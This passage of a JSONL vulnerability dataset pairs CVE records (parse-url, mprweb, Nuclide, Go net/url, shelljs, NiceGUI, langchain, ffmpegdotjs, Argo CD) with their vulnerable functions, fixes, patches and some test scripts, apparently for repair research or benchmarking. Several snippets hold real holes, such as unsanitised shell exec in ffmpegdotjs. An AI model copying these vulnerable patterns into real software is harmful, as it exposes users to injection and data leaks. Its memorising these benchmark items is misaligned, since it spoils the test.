-10,6 +15,20 @@\n }\n url = normalizeUrl(url, normalize)\n }\n+\n const parsed = parsePath(url)\n+\n+ // Potential git-ssh urls\n+ if (parsed.protocol === \"file\") {\n+ const matched = parsed.href.match(GIT_RE)\n+ if (matched) {\n+ parsed.protocols = [\"ssh\"]\n+ parsed.protocol = \"ssh\"\n+ parsed.resource = matched[4]\n+ parsed.user = \"git\"\n+ parsed.pathname = `/${matched[6]}`\n+ }\n+ }\n+\n return parsed;\n }\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-0722:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/parse-url\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnode test\n", "unit_test_cmd": null} {"cve_id": "CVE-2022-31185", "cve_description": "mprweb is a hosting platform for the makedeb Package Repository. Email addresses were found to not have been hidden, even if a user had clicked the `Hide Email Address` checkbox on their account page, or during signup. This could lead to an account's email being leaked, which may be problematic if your email needs to remain private for any reason. Users hosting their own mprweb instance will need to upgrade to the latest commit to get this fixed. Users on the official instance will already have this issue fixed.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/makedeb/mprweb", "patch_url": ["https://github.com/makedeb/mprweb/commit/d13e3f2f5a9c0b0f6782f35d837090732026ad77"], "programing_language": "Python", "vul_func": [{"id": "vul_py_213_1", "commit": "908b81a", "file_path": "aurweb/routers/accounts.py", "start_line": 269, "end_line": 357, "snippet": "async def account_register_post(\n request: Request,\n U: str = Form(default=str()), # Username\n E: str = Form(default=str()), # Email\n H: str = Form(default=False), # Hide Email\n BE: str = Form(default=None), # Backup Email\n R: str = Form(default=\"\"), # Real Name\n HP: str = Form(default=None), # Homepage\n I: str = Form(default=None), # IRC Nick # noqa: E741\n K: str = Form(default=None), # PGP Key\n L: str = Form(default=aurweb.config.get(\"options\", \"default_lang\")),\n TZ: str = Form(default=aurweb.config.get(\"options\", \"default_timezone\")),\n PK: str = Form(default=None), # SSH PubKey\n CN: bool = Form(default=False),\n UN: bool = Form(default=False),\n ON: bool = Form(default=False),\n captcha: str = Form(default=None),\n captcha_salt: str = Form(...),\n):\n context = await make_variable_context(request, \"Register\")\n args = dict(await request.form())\n\n context = make_account_form_context(context, request, None, args)\n ok, errors = process_account_form(request, request.user, args)\n if not ok:\n # If the field values given do not meet the requirements,\n # return HTTP 400 with an error.\n context[\"errors\"] = errors\n return render_template(\n request, \"register.html\", context, status_code=HTTPStatus.BAD_REQUEST\n )\n\n if not captcha:\n context[\"errors\"] = [\"The CAPTCHA is missing.\"]\n return render_template(\n request, \"register.html\", context, status_code=HTTPStatus.BAD_REQUEST\n )\n\n # Create a user with no password with a resetkey, then send\n # an email off about it.\n resetkey = generate_resetkey()\n\n # By default, we grab the User account type to associate with.\n atype = db.query(\n models.AccountType, models.AccountType.AccountType == \"User\"\n ).first()\n\n # Create a user given all parameters available.\n with db.begin():\n user = db.create(\n models.User,\n Username=U,\n Email=E,\n HideEmail=H,\n BackupEmail=BE,\n RealName=R,\n Homepage=HP,\n IRCNick=I,\n PGPKey=K,\n LangPreference=L,\n Timezone=TZ,\n CommentNotify=CN,\n UpdateNotify=UN,\n OwnershipNotify=ON,\n ResetKey=resetkey,\n AccountType=atype,\n )\n\n # If a PK was given and either one does not exist or the given\n # PK mismatches the existing user's SSHPubKey.PubKey.\n if PK:\n # Get the second element in the PK, which is the actual key.\n pubkey = PK.strip().rstrip()\n parts = pubkey.split(\" \")\n if len(parts) == 3:\n # Remove the host part.\n pubkey = parts[0] + \" \" + parts[1]\n fingerprint = get_fingerprint(pubkey)\n with db.begin():\n user.ssh_pub_key = models.SSHPubKey(\n UserID=user.ID, PubKey=pubkey, Fingerprint=fingerprint\n )\n\n # Send a reset key notification to the new user.\n WelcomeNotification(user.ID).send()\n\n context[\"complete\"] = True\n context[\"user\"] = user\n return render_template(request, \"register.html\", context)"}], "fix_func": [{"id": "fix_py_213_1", "commit": "d13e3f2", "file_path": "aurweb/routers/accounts.py", "start_line": 269, "end_line": 363, "snippet": "async def account_register_post(\n request: Request,\n U: str = Form(default=str()), # Username\n E: str = Form(default=str()), # Email\n H: str = Form(default=\"off\"), # Hide Email\n BE: str = Form(default=None), # Backup Email\n R: str = Form(default=\"\"), # Real Name\n HP: str = Form(default=None), # Homepage\n I: str = Form(default=None), # IRC Nick # noqa: E741\n K: str = Form(default=None), # PGP Key\n L: str = Form(default=aurweb.config.get(\"options\", \"default_lang\")),\n TZ: str = Form(default=aurweb.config.get(\"options\", \"default_timezone\")),\n PK: str = Form(default=None), # SSH PubKey\n CN: bool = Form(default=False),\n UN: bool = Form(default=False),\n ON: bool = Form(default=False),\n captcha: str = Form(default=None),\n captcha_salt: str = Form(...),\n):\n context = await make_variable_context(request, \"Register\")\n args = dict(await request.form())\n\n context = make_account_form_context(context, request, None, args)\n ok, errors = process_account_form(request, request.user, args)\n if not ok:\n # If the field values given do not meet the requirements,\n # return HTTP 400 with an error.\n context[\"errors\"] = errors\n return render_template(\n request, \"register.html\", context, status_code=HTTPStatus.BAD_REQUEST\n )\n\n if not captcha:\n context[\"errors\"] = [\"The CAPTCHA is missing.\"]\n return render_template(\n request, \"register.html\", context, status_code=HTTPStatus.BAD_REQUEST\n )\n\n # Create a user with no password with a resetkey, then send\n # an email off about it.\n resetkey = generate_resetkey()\n\n # By default, we grab the User account type to associate with.\n atype = db.query(\n models.AccountType, models.AccountType.AccountType == \"User\"\n ).first()\n\n # Check if we should turn on HideEmail.\n if H == \"on\":\n hide_email = 1\n else:\n hide_email = 0\n\n # Create a user given all parameters available.\n with db.begin():\n user = db.create(\n models.User,\n Username=U,\n Email=E,\n HideEmail=hide_email,\n BackupEmail=BE,\n RealName=R,\n Homepage=HP,\n IRCNick=I,\n PGPKey=K,\n LangPreference=L,\n Timezone=TZ,\n CommentNotify=CN,\n UpdateNotify=UN,\n OwnershipNotify=ON,\n ResetKey=resetkey,\n AccountType=atype,\n )\n\n # If a PK was given and either one does not exist or the given\n # PK mismatches the existing user's SSHPubKey.PubKey.\n if PK:\n # Get the second element in the PK, which is the actual key.\n pubkey = PK.strip().rstrip()\n parts = pubkey.split(\" \")\n if len(parts) == 3:\n # Remove the host part.\n pubkey = parts[0] + \" \" + parts[1]\n fingerprint = get_fingerprint(pubkey)\n with db.begin():\n user.ssh_pub_key = models.SSHPubKey(\n UserID=user.ID, PubKey=pubkey, Fingerprint=fingerprint\n )\n\n # Send a reset key notification to the new user.\n WelcomeNotification(user.ID).send()\n\n context[\"complete\"] = True\n context[\"user\"] = user\n return render_template(request, \"register.html\", context)"}], "vul_patch": "--- a/aurweb/routers/accounts.py\n+++ b/aurweb/routers/accounts.py\n@@ -2,7 +2,7 @@\n request: Request,\n U: str = Form(default=str()), # Username\n E: str = Form(default=str()), # Email\n- H: str = Form(default=False), # Hide Email\n+ H: str = Form(default=\"off\"), # Hide Email\n BE: str = Form(default=None), # Backup Email\n R: str = Form(default=\"\"), # Real Name\n HP: str = Form(default=None), # Homepage\n@@ -45,13 +45,19 @@\n models.AccountType, models.AccountType.AccountType == \"User\"\n ).first()\n \n+ # Check if we should turn on HideEmail.\n+ if H == \"on\":\n+ hide_email = 1\n+ else:\n+ hide_email = 0\n+\n # Create a user given all parameters available.\n with db.begin():\n user = db.create(\n models.User,\n Username=U,\n Email=E,\n- HideEmail=H,\n+ HideEmail=hide_email,\n BackupEmail=BE,\n RealName=R,\n Homepage=HP,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-6333", "cve_description": "The hhvm-attach deep link handler in Nuclide did not properly sanitize the provided hostname parameter when rendering. As a result, a malicious URL could be used to render HTML and other content inside of the editor's context, which could potentially be chained to lead to code execution. This issue affected Nuclide prior to v0.290.0.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/facebook/nuclide", "patch_url": ["https://github.com/facebook/nuclide/commit/65f6bbd683404be1bb569b8d1be84b5d4c74a324"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_198_1", "commit": "ee8e058", "file_path": "pkg/nuclide-hhvm/lib/main.js", "start_line": 80, "end_line": 180, "snippet": " async _debugDeepWithHhvm(params: DeepLinkParams): Promise {\n const {nuclidePath, hackRoot, line, addBreakpoint, source} = params;\n\n if (\n typeof nuclidePath !== 'string' ||\n !nuclideUri.isRemote(nuclidePath) ||\n typeof hackRoot !== 'string'\n ) {\n atom.notifications.addError('Invalid arguments.');\n return;\n }\n\n const pathString = decodeURIComponent(String(nuclidePath));\n const hackRootString = decodeURIComponent(String(hackRoot));\n\n const startDebugger =\n params.noDebugger == null || params.noDebugger !== 'true';\n\n track('nuclide-attach-hhvm-deeplink', {\n pathString,\n line,\n addBreakpoint,\n source,\n });\n\n if (this._remoteProjectsService == null) {\n atom.notifications.addError('The remote project service is unavailable.');\n return;\n } else {\n const remoteProjectsService = this._remoteProjectsService;\n await new Promise(resolve =>\n remoteProjectsService.waitForRemoteProjectReload(resolve),\n );\n }\n\n const host = nuclideUri.getHostname(pathString);\n const cwd = nuclideUri.createRemoteUri(host, hackRootString);\n const notification = atom.notifications.addInfo(\n startDebugger\n ? `Connecting to ${host} and attaching debugger...`\n : `Connecting to ${host}...`,\n {\n dismissable: true,\n },\n );\n\n invariant(this._remoteProjectsService != null);\n const remoteConnection = await this._remoteProjectsService.createRemoteConnection(\n {\n host,\n cwd: nuclideUri.getPath(cwd),\n displayTitle: host,\n },\n );\n\n if (remoteConnection == null) {\n atom.notifications.addError(`Could not connect to ${host}`);\n return;\n }\n\n // The hostname might have changed slightly from what was passed in due to\n // DNS lookup, so create a new remote URI rather than using cwd from above.\n const hackRootUri = remoteConnection.getUriOfRemotePath(hackRootString);\n const navUri = remoteConnection.getUriOfRemotePath(\n nuclideUri.getPath(pathString),\n );\n\n // Set the current project root.\n if (this._cwdApi != null) {\n this._cwdApi.setCwd(hackRootUri);\n }\n\n // Open the script path in the editor.\n const lineNumber = parseInt(line, 10);\n if (Number.isNaN(lineNumber)) {\n goToLocation(navUri);\n } else {\n // NOTE: line numbers start at 0, so subtract 1.\n goToLocation(navUri, {line: lineNumber - 1});\n }\n\n if (startDebugger) {\n // Debug the remote HHVM server!\n const debuggerService = await consumeFirstProvider(\n 'nuclide-debugger.remote',\n );\n\n if (addBreakpoint === 'true' && !Number.isNaN(lineNumber)) {\n // Insert a breakpoint if requested.\n // NOTE: Nuclide protocol breakpoint line numbers start at 0, so subtract 1.\n debuggerService.addBreakpoint(navUri, lineNumber - 1);\n }\n\n await debuggerService.startDebugging(\n await getAttachProcessInfo(hackRootUri),\n );\n }\n\n notification.dismiss();\n }\n}"}], "fix_func": [{"id": "fix_js_198_1", "commit": "65f6bbd", "file_path": "pkg/nuclide-hhvm/lib/main.js", "start_line": 80, "end_line": 191, "snippet": " async _debugDeepWithHhvm(params: DeepLinkParams): Promise {\n const {nuclidePath, hackRoot, line, addBreakpoint, source} = params;\n\n if (\n typeof nuclidePath !== 'string' ||\n !nuclideUri.isRemote(nuclidePath) ||\n typeof hackRoot !== 'string'\n ) {\n atom.notifications.addError('Invalid arguments.');\n return;\n }\n\n const pathString = decodeURIComponent(String(nuclidePath));\n const hackRootString = decodeURIComponent(String(hackRoot));\n\n const startDebugger =\n params.noDebugger == null || params.noDebugger !== 'true';\n\n track('nuclide-attach-hhvm-deeplink', {\n pathString,\n line,\n addBreakpoint,\n source,\n });\n\n if (this._remoteProjectsService == null) {\n atom.notifications.addError('The remote project service is unavailable.');\n return;\n } else {\n const remoteProjectsService = this._remoteProjectsService;\n await new Promise(resolve =>\n remoteProjectsService.waitForRemoteProjectReload(resolve),\n );\n }\n\n const host = nuclideUri.getHostname(pathString);\n\n // Allow only valid hostname characters, per RFC 952:\n // https://tools.ietf.org/html/rfc952\n const invalidMatch = host.match(/[^A-Za-z0-9\\-._]+/);\n if (invalidMatch != null) {\n atom.notifications.addError(\n 'The specified host name contained invalid characters.',\n );\n return;\n }\n\n const cwd = nuclideUri.createRemoteUri(host, hackRootString);\n const notification = atom.notifications.addInfo(\n startDebugger\n ? `Connecting to ${host} and attaching debugger...`\n : `Connecting to ${host}...`,\n {\n dismissable: true,\n },\n );\n\n invariant(this._remoteProjectsService != null);\n const remoteConnection = await this._remoteProjectsService.createRemoteConnection(\n {\n host,\n cwd: nuclideUri.getPath(cwd),\n displayTitle: host,\n },\n );\n\n if (remoteConnection == null) {\n atom.notifications.addError(`Could not connect to ${host}`);\n return;\n }\n\n // The hostname might have changed slightly from what was passed in due to\n // DNS lookup, so create a new remote URI rather than using cwd from above.\n const hackRootUri = remoteConnection.getUriOfRemotePath(hackRootString);\n const navUri = remoteConnection.getUriOfRemotePath(\n nuclideUri.getPath(pathString),\n );\n\n // Set the current project root.\n if (this._cwdApi != null) {\n this._cwdApi.setCwd(hackRootUri);\n }\n\n // Open the script path in the editor.\n const lineNumber = parseInt(line, 10);\n if (Number.isNaN(lineNumber)) {\n goToLocation(navUri);\n } else {\n // NOTE: line numbers start at 0, so subtract 1.\n goToLocation(navUri, {line: lineNumber - 1});\n }\n\n if (startDebugger) {\n // Debug the remote HHVM server!\n const debuggerService = await consumeFirstProvider(\n 'nuclide-debugger.remote',\n );\n\n if (addBreakpoint === 'true' && !Number.isNaN(lineNumber)) {\n // Insert a breakpoint if requested.\n // NOTE: Nuclide protocol breakpoint line numbers start at 0, so subtract 1.\n debuggerService.addBreakpoint(navUri, lineNumber - 1);\n }\n\n await debuggerService.startDebugging(\n await getAttachProcessInfo(hackRootUri),\n );\n }\n\n notification.dismiss();\n }\n}"}], "vul_patch": "--- a/pkg/nuclide-hhvm/lib/main.js\n+++ b/pkg/nuclide-hhvm/lib/main.js\n@@ -34,6 +34,17 @@\n }\n \n const host = nuclideUri.getHostname(pathString);\n+\n+ // Allow only valid hostname characters, per RFC 952:\n+ // https://tools.ietf.org/html/rfc952\n+ const invalidMatch = host.match(/[^A-Za-z0-9\\-._]+/);\n+ if (invalidMatch != null) {\n+ atom.notifications.addError(\n+ 'The specified host name contained invalid characters.',\n+ );\n+ return;\n+ }\n+\n const cwd = nuclideUri.createRemoteUri(host, hackRootString);\n const notification = atom.notifications.addInfo(\n startDebugger\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-32190", "cve_description": "JoinPath and URL.JoinPath do not remove ../ path elements appended to a relative path. For example, JoinPath(\"https://go.dev\", \"../go\") returns the URL \"https://go.dev/../go\", despite the JoinPath documentation stating that ../ path elements are removed from the result.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/golang/go", "patch_url": ["https://github.com/golang/go/commit/28335508913a46e05ef0c04a18e8a1a6beb775ec"], "programing_language": "Go", "vul_func": [{"id": "vul_go_90_1", "commit": "d2bcb22", "file_path": "src/net/url/url.go", "start_line": "1193", "end_line": "1206", "snippet": "func (u *URL) JoinPath(elem ...string) *URL {\n\turl := *u\n\tif len(elem) > 0 {\n\t\telem = append([]string{u.EscapedPath()}, elem...)\n\t\tp := path.Join(elem...)\n\t\t// path.Join will remove any trailing slashes.\n\t\t// Preserve at least one.\n\t\tif strings.HasSuffix(elem[len(elem)-1], \"/\") && !strings.HasSuffix(p, \"/\") {\n\t\t\tp += \"/\"\n\t\t}\n\t\turl.setPath(p)\n\t}\n\treturn &url\n}"}], "fix_func": [{"id": "fix_go_90_1", "commit": "2833550", "file_path": "src/net/url/url.go", "start_line": "1193", "end_line": "1212", "snippet": "func (u *URL) JoinPath(elem ...string) *URL {\n\telem = append([]string{u.EscapedPath()}, elem...)\n\tvar p string\n\tif !strings.HasPrefix(elem[0], \"/\") {\n\t\t// Return a relative path if u is relative,\n\t\t// but ensure that it contains no ../ elements.\n\t\telem[0] = \"/\" + elem[0]\n\t\tp = path.Join(elem...)[1:]\n\t} else {\n\t\tp = path.Join(elem...)\n\t}\n\t// path.Join will remove any trailing slashes.\n\t// Preserve at least one.\n\tif strings.HasSuffix(elem[len(elem)-1], \"/\") && !strings.HasSuffix(p, \"/\") {\n\t\tp += \"/\"\n\t}\n\turl := *u\n\turl.setPath(p)\n\treturn &url\n}"}], "vul_patch": "--- a/src/net/url/url.go\n+++ b/src/net/url/url.go\n@@ -1,14 +1,20 @@\n func (u *URL) JoinPath(elem ...string) *URL {\n+\telem = append([]string{u.EscapedPath()}, elem...)\n+\tvar p string\n+\tif !strings.HasPrefix(elem[0], \"/\") {\n+\t\t// Return a relative path if u is relative,\n+\t\t// but ensure that it contains no ../ elements.\n+\t\telem[0] = \"/\" + elem[0]\n+\t\tp = path.Join(elem...)[1:]\n+\t} else {\n+\t\tp = path.Join(elem...)\n+\t}\n+\t// path.Join will remove any trailing slashes.\n+\t// Preserve at least one.\n+\tif strings.HasSuffix(elem[len(elem)-1], \"/\") && !strings.HasSuffix(p, \"/\") {\n+\t\tp += \"/\"\n+\t}\n \turl := *u\n-\tif len(elem) > 0 {\n-\t\telem = append([]string{u.EscapedPath()}, elem...)\n-\t\tp := path.Join(elem...)\n-\t\t// path.Join will remove any trailing slashes.\n-\t\t// Preserve at least one.\n-\t\tif strings.HasSuffix(elem[len(elem)-1], \"/\") && !strings.HasSuffix(p, \"/\") {\n-\t\t\tp += \"/\"\n-\t\t}\n-\t\turl.setPath(p)\n-\t}\n+\turl.setPath(p)\n \treturn &url\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-0144", "cve_description": "shelljs is vulnerable to Improper Privilege Management", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/shelljs/shelljs", "patch_url": ["https://github.com/shelljs/shelljs/commit/d919d22dd6de385edaa9d90313075a77f74b338c"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_258_1", "commit": "fcf1651", "file_path": "src/exec.js", "start_line": 51, "end_line": 51, "snippet": " fs.writeFileSync(paramsFile, JSON.stringify(paramsToSerialize), 'utf8');"}], "fix_func": [{"id": "fix_js_258_1", "commit": "d919d22dd6de385edaa9d90313075a77f74b338c", "file_path": "src/exec.js", "start_line": 60, "end_line": 65, "snippet": " function writeFileLockedDown(filePath, data) {\n fs.writeFileSync(filePath, data, {\n encoding: 'utf8',\n mode: parseInt('600', 8),\n });\n }"}, {"id": "fix_js_258_2", "commit": "d919d22dd6de385edaa9d90313075a77f74b338c", "file_path": "src/exec.js", "start_line": 66, "end_line": 68, "snippet": " writeFileLockedDown(stdoutFile, '');\n writeFileLockedDown(stderrFile, '');\n writeFileLockedDown(paramsFile, JSON.stringify(paramsToSerialize));"}], "vul_patch": "--- a/src/exec.js\n+++ b/src/exec.js\n@@ -1 +1,6 @@\n- fs.writeFileSync(paramsFile, JSON.stringify(paramsToSerialize), 'utf8');\n+ function writeFileLockedDown(filePath, data) {\n+ fs.writeFileSync(filePath, data, {\n+ encoding: 'utf8',\n+ mode: parseInt('600', 8),\n+ });\n+ }\n\n--- /dev/null\n+++ b/src/exec.js\n@@ -0,0 +1,3 @@\n+ writeFileLockedDown(stdoutFile, '');\n+ writeFileLockedDown(stderrFile, '');\n+ writeFileLockedDown(paramsFile, JSON.stringify(paramsToSerialize));\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-21618", "cve_description": "NiceGUI is an easy-to-use, Python-based UI framework. Prior to 2.9.1, authenticating with NiceGUI logged in the user for all browsers, including browsers in incognito mode. This vulnerability is fixed in 2.9.1.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/zauberzeug/nicegui", "patch_url": ["https://github.com/zauberzeug/nicegui/commit/1621a4ba6a06676b8094362d36623551e651adc1"], "programing_language": "Python", "vul_func": [{"id": "vul_py_358_1", "commit": "c063791b21a51dc966da654bd9545e9c5506fa8f", "file_path": "nicegui/air.py", "start_line": 50, "end_line": 77, "snippet": " async def _handle_http(data: Dict[str, Any]) -> Dict[str, Any]:\n headers: Dict[str, Any] = data['headers']\n headers.update({'Accept-Encoding': 'identity', 'X-Forwarded-Prefix': data['prefix']})\n url = 'http://test' + data['path']\n request = self.client.build_request(\n data['method'],\n url,\n params=data['params'],\n headers=headers,\n content=data['body'],\n )\n response = await self.client.send(request)\n instance_id = data['instance-id']\n content = response.content.replace(\n b'const extraHeaders = {};',\n (f'const extraHeaders = {{ \"fly-force-instance-id\" : \"{instance_id}\" }};').encode(),\n )\n match = re.search(b'const query = ({.*?})', content)\n if match:\n new_js_object = match.group(1).decode().rstrip('}') + \", 'fly_instance_id' : '\" + instance_id + \"'}\"\n content = content.replace(match.group(0), f'const query = {new_js_object}'.encode())\n compressed = gzip.compress(content)\n response.headers.update({'content-encoding': 'gzip', 'content-length': str(len(compressed))})\n return {\n 'status_code': response.status_code,\n 'headers': response.headers.multi_items(),\n 'content': compressed,\n }"}], "fix_func": [{"id": "fix_py_358_1", "commit": "1621a4ba6a06676b8094362d36623551e651adc1", "file_path": "nicegui/air.py", "start_line": 50, "end_line": 78, "snippet": " async def _handle_http(data: Dict[str, Any]) -> Dict[str, Any]:\n headers: Dict[str, Any] = data['headers']\n headers.update({'Accept-Encoding': 'identity', 'X-Forwarded-Prefix': data['prefix']})\n url = 'http://test' + data['path']\n request = self.client.build_request(\n data['method'],\n url,\n params=data['params'],\n headers=headers,\n content=data['body'],\n )\n response = await self.client.send(request)\n self.client.cookies.clear()\n instance_id = data['instance-id']\n content = response.content.replace(\n b'const extraHeaders = {};',\n (f'const extraHeaders = {{ \"fly-force-instance-id\" : \"{instance_id}\" }};').encode(),\n )\n match = re.search(b'const query = ({.*?})', content)\n if match:\n new_js_object = match.group(1).decode().rstrip('}') + \", 'fly_instance_id' : '\" + instance_id + \"'}\"\n content = content.replace(match.group(0), f'const query = {new_js_object}'.encode())\n compressed = gzip.compress(content)\n response.headers.update({'content-encoding': 'gzip', 'content-length': str(len(compressed))})\n return {\n 'status_code': response.status_code,\n 'headers': response.headers.multi_items(),\n 'content': compressed,\n }"}], "vul_patch": "--- a/nicegui/air.py\n+++ b/nicegui/air.py\n@@ -10,6 +10,7 @@\n content=data['body'],\n )\n response = await self.client.send(request)\n+ self.client.cookies.clear()\n instance_id = data['instance-id']\n content = response.content.replace(\n b'const extraHeaders = {};',\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-36281", "cve_description": "An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via a JSON file to load_prompt. This is related to __subclasses__ or a template.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/langchain-ai/langchain", "patch_url": ["https://github.com/langchain-ai/langchain/commit/22abeb9f6cc555591bf8e92b5e328e43aa07ff6c"], "programing_language": "Python", "vul_func": [{"id": "vul_py_303_1", "commit": "b642d00", "file_path": "libs/langchain/langchain/prompts/loading.py", "start_line": 111, "end_line": 116, "snippet": "def _load_prompt(config: dict) -> PromptTemplate:\n \"\"\"Load the prompt template from config.\"\"\"\n # Load the template from disk if necessary.\n config = _load_template(\"template\", config)\n config = _load_output_parser(config)\n return PromptTemplate(**config)"}], "fix_func": [{"id": "fix_py_303_1", "commit": "22abeb9f6cc555591bf8e92b5e328e43aa07ff6c", "file_path": "libs/langchain/langchain/prompts/loading.py", "start_line": 111, "end_line": 127, "snippet": "def _load_prompt(config: dict) -> PromptTemplate:\n \"\"\"Load the prompt template from config.\"\"\"\n # Load the template from disk if necessary.\n config = _load_template(\"template\", config)\n config = _load_output_parser(config)\n\n template_format = config.get(\"template_format\", \"f-string\")\n if template_format == \"jinja2\":\n # Disabled due to:\n # https://github.com/langchain-ai/langchain/issues/4394\n raise ValueError(\n f\"Loading templates with '{template_format}' format is no longer supported \"\n f\"since it can lead to arbitrary code execution. Please migrate to using \"\n f\"the 'f-string' template format, which does not suffer from this issue.\"\n )\n\n return PromptTemplate(**config)"}], "vul_patch": "--- a/libs/langchain/langchain/prompts/loading.py\n+++ b/libs/langchain/langchain/prompts/loading.py\n@@ -3,4 +3,15 @@\n # Load the template from disk if necessary.\n config = _load_template(\"template\", config)\n config = _load_output_parser(config)\n+\n+ template_format = config.get(\"template_format\", \"f-string\")\n+ if template_format == \"jinja2\":\n+ # Disabled due to:\n+ # https://github.com/langchain-ai/langchain/issues/4394\n+ raise ValueError(\n+ f\"Loading templates with '{template_format}' format is no longer supported \"\n+ f\"since it can lead to arbitrary code execution. Please migrate to using \"\n+ f\"the 'f-string' template format, which does not suffer from this issue.\"\n+ )\n+\n return PromptTemplate(**config)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-23376", "cve_description": "This affects all versions of package ffmpegdotjs. If attacker-controlled user input is given to the trimvideo function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.", "cwe_info": {"CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/TRomesh/ffmpegdotjs", "patch_url": ["https://github.com/TRomesh/ffmpegdotjs/commit/dae868764d6418dac081ed1aa84c636645ba6adb"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_21_1", "commit": "b7395da", "file_path": "index.js", "start_line": 216, "end_line": 233, "snippet": " trimvideo: (input, start, duration, output) => {\n return new Promise(function(resolve, reject) {\n if (fs.existsSync(input)) {\n exec(\n `ffmpeg -hide_banner -loglevel quiet -ss ${start} -i ${input} -t ${duration} -c copy -y ${output}.mp4`,\n (error, stdout, stderr) => {\n if (error) {\n reject(error);\n return;\n }\n resolve(`${output}.mp4`);\n }\n );\n } else {\n reject(new Error(\"ffmpegdotjs could not find file\"));\n }\n });\n },"}], "fix_func": [{"id": "fix_js_21_1", "commit": "dae868764d6418dac081ed1aa84c636645ba6adb", "file_path": "index.js", "start_line": 216, "end_line": 233, "snippet": " trimvideo: (input, start, duration, output) => {\n return new Promise(function(resolve, reject) {\n if (fs.existsSync(input)) {\n execFile(\n 'ffmpeg', `-hide_banner -loglevel quiet -ss ${start} -i ${input} -t ${duration} -c copy -y ${output}.mp4`.split(\" \"),\n (error, stdout, stderr) => {\n if (error) {\n reject(error);\n return;\n }\n resolve(`${output}.mp4`);\n }\n );\n } else {\n reject(new Error(\"ffmpegdotjs could not find file\"));\n }\n });\n },"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1,8 +1,8 @@\n trimvideo: (input, start, duration, output) => {\n return new Promise(function(resolve, reject) {\n if (fs.existsSync(input)) {\n- exec(\n- `ffmpeg -hide_banner -loglevel quiet -ss ${start} -i ${input} -t ${duration} -c copy -y ${output}.mp4`,\n+ execFile(\n+ 'ffmpeg', `-hide_banner -loglevel quiet -ss ${start} -i ${input} -t ${duration} -c copy -y ${output}.mp4`.split(\" \"),\n (error, stdout, stderr) => {\n if (error) {\n reject(error);\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-23376:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/ffmpegdotjs\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest ./poc\n", "unit_test_cmd": null} {"cve_id": "CVE-2021-26921", "cve_description": "In util/session/sessionmanager.go in Argo CD before 1.8.4, tokens continue to work even when the user account is disabled.", "cwe_info": {"CWE-613": {"name": "Insufficient Session Expiration", "description": "According to WASC, \"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\""}}, "repo": "https://github.com/argoproj/argo-cd", "patch_url": ["https://github.com/argoproj/argo-cd/commit/f5b0db240b4e3abf18e97f6fd99096b4f9e94dc5"], "programing_language": "Go", "vul_func": [{"id": "vul_go_66_1", "commit": "ce43b7a", "file_path": "util/session/sessionmanager.go", "start_line": 239, "end_line": 294, "snippet": "func (mgr *SessionManager) Parse(tokenString string) (jwt.Claims, error) {\n\t// Parse takes the token string and a function for looking up the key. The latter is especially\n\t// useful if you use multiple keys for your application. The standard is to use 'kid' in the\n\t// head of the token to identify which key to use, but the parsed token (head and claims) is provided\n\t// to the callback, providing flexibility.\n\tvar claims jwt.MapClaims\n\tsettings, err := 